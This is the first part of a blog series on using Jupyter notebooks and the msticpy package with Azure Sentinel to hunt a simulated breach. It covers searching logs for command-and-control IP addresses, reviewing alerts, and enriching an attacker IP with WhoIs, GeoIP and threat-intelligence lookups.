This is the first part of a three-part article about using Jupyter notebooks in Azure Sentinel. In this series we will be using Jupyter and Python to trace the path of a security breach in a network. The article is accompanied by a Jupyter notebook that illustrates:
- how to query and display Azure Sentinel log data,
- how to enhance the data using external threat intelligence and other network databases (such as GeoIP),
- cleaning, filtering and analyzing data using the pandas and scikit-learn packages
- visualizing the data in tabular and graphical forms.
The notebook contains all the code used in articles.
The Attack Scenario
We will investigate a simulated attack using Jupyter and Python to query, analyze and interpret data from Azure Sentinel.
- Part 1 starts from receipt of a threat intelligence report and looks at how to investigate the characteristics of an attacker IP address and view related alerts in Azure Sentinel.
- Part 2 will look at the attacker activity on a Linux host and at the network traffic patterns that lead us to discover a second compromised host.
- Part 3 will carry the investigation on to this secondary Windows host and the subsequent exfiltration of Office 365 documents.
The attack scenario is illustrated in the following figure.
Before getting into our hunting scenario, it is worth pausing to ask why we would want to use Jupyter notebooks with Azure Sentinel, given that it has a lot of powerful query, investigation, data manipulation and visualization capabilities of its own. One of the principal reasons that we built Azure Sentinel with a powerful query API was to support its use with external tools such as Jupyter.
If you are new to Jupyter notebooks you should review this article, which gives a more detailed description of the additional capabilities that Jupyter brings. In brief these are:
- Data persistence, repeatability and backtracking in a single shareable document
- Full scripting and programming environment
- Ability to join data from external sources (i.e. not only data stored in Azure Sentinel)
- Access to a huge array of python libraries bringing capabilities such as: machine learning and deep learning; advanced data processing and analysis; graphing and visualization.
For more background on starting out with Azure Sentinel and Jupyter look at either of the following documents:
The Hunting Notebook
The companion notebook to this article is (intentionally) long. It is meant to be illustrative/education rather than used as-is. For that reason, I’ve tried to leave as much code and commenting as possible in the notebook for those that want to delve under the covers. However, you don’t need to read any code to follow the blog and look at the results of the notebook. I do encourage you to keep the notebook open as you read this though – since there is a lot more data and visual content in the notebook than we can reasonably fit into a blog post.
The notebook used in this article is available here and has sample data saved with it. Viewing it with nbviewer.org (open in nbviewer) will keep the rendering as close to the original as possible and I recommend using that over the native GitHub viewer. Feel free to copy/paste sections and snippets to use in your own notebooks if you find them useful.
In part one we will look at the attacker’s first incursion into our network (step 1 on the earlier Scenario diagram) and introduce some of the components for exploring Azure Sentinel’s notebook integration.
Threat Intelligence Report
Our investigation is triggered by a Threat Intelligence report. This could be part of a threat intelligence feed that you subscribe to, a CERT advisory email, or a result of ad hoc browsing of online reports. In each case you might see something like this as part of the report.
Indicators of Compromise (courtesy FireEye)
You can see a mixture of IP Addresses, URLs and file hashes in the list – all of which might be the basis for searching your organization’s data to see if any show up. In our case we will start with a list of Command & Control (C2) IP Addresses identified in the report. The techniques shown later in the notebook are usable irrespective of your starting point. For example, it could be an unusual event identified in the Azure Sentinel Hunting Queries as shown below.
Hunting Queries in Azure Sentinel
Searching for IP Address Use
We want to know whether any of the C2 IPs have been seen in our network. Obviously, you would want to search network logs for this, but using the Kusto Query Language (KQL) search operator we can as easily search across all our logs (this can take more time but will uncover more useful results).
We use the time-range selector to set the range for queries (using this makes it easier to change the time ranges and re-run the queries than typing in the dates each time). Here we are, somewhat artificially, searching over a single day, but searching one or more weeks would be typical.
Time-Range Selector Widget
Results of C2 IP Query
We can see that one of the IP Addresses shows up in several logs besides our network log, including the Security Alerts table. This is probably the first place we should look at. Hits in Syslog and Linux Audit log tables indicate that at least one of our Linux hosts knows something about this address.
A closer look at the alerts seems to confirm this.
Looking at the alerts, we can see a series of SSH brute force (Anomalous Login) alerts followed by a Suspicious File Download alert. Scrolling down the details of the alert reveals our C2 IP address being used as the source of a shell script download.
Suspicious File Download Alert
C2 IP used in wget HTTP download
The notebook makes use of a few tools from the msticpy package. This is an ongoing development project started by Microsoft security analysts to collect together tools that aid common investigation or hunting tasks (visit the GitHub for more details and documentation of the tools). We’ve seen a few of these used already:
- A widget to set the alert date range for the query
- Built-in query to fetch alerts for the specified time range
- AlertSelector and AlertDisplay to select and display the alert contents. The scrollbar in the alert pane lets you scroll to see all the alert properties, extended properties and entities.
In this section of the notebook you can also see the use of the IoCExtractor class to pull out useful items (like IP Addresses, hashes and URLs) from text strings or data sets.
A note about Entities
Entities are simple classes that define well-known set of properties for things like hosts, processes, accounts IP addresses, etc. Using these provides a useful abstraction from the way these items might be represented in different data sets; you’ll see these appearing in the notebook code, in other contexts in Azure Sentinel and in the alerts generated by Azure Security Center.
When you come across a suspicious IP address (or anything suspicious) you want to find out as much about it as you can. We can do a series of checks on the IP address, for example retrieving registration information from public WhoIs databases and finding its geographic location.
Reverse IP and WhoIs lookup
Note: Since the “attacker” in this case was a server of mine, I’m ok that Microsoft seems to be the owner of this C2 address .
GeoIP Lookup and display of the original C2 IPs with our attacker IP indicated in red.
Threat Intelligence and IP Reputation Lookup
Some of the more interesting lookups that we can do include checking whether the IP Address shows up in threat intelligence and IP reputation databases.
The following shows retrieval of a threat intel indicator from our Azure Sentinel workspace (assuming that you have on-boarded Threat Intel feeds into your subscription) and a query to the VirusTotal API.
Query from Azure Sentinel Bring-your-own-threat-intel
Virus Total Lookup
In this first part we’ve covered starting out with Azure Sentinel and using the power of Jupyter notebooks to:
- search across data stored in Azure Sentinel to identify which datasets contain the items that we’re looking for,
- view and manipulate Security Alerts and Entities,
- correlate this data with external data sources such as threat intelligence sources, geo-ip and IP registration services.
We’ve also introduced some of the Python modules in the msticpy package that you can use to speed up the development of your own notebooks and gain insights from your Azure Sentinel data more quickly and more repeatably.
In the next part we’ll continue to follow our attacker’s path on to a compromised Linux host: examining processes auditing and logon sessions on the host and looking at network traffic to see where else our guest might have roamed. As part of this we’ll look at another card that Python brings to the investigative table – the ability to re-process and decode log data to pull out additional information needed for our investigation.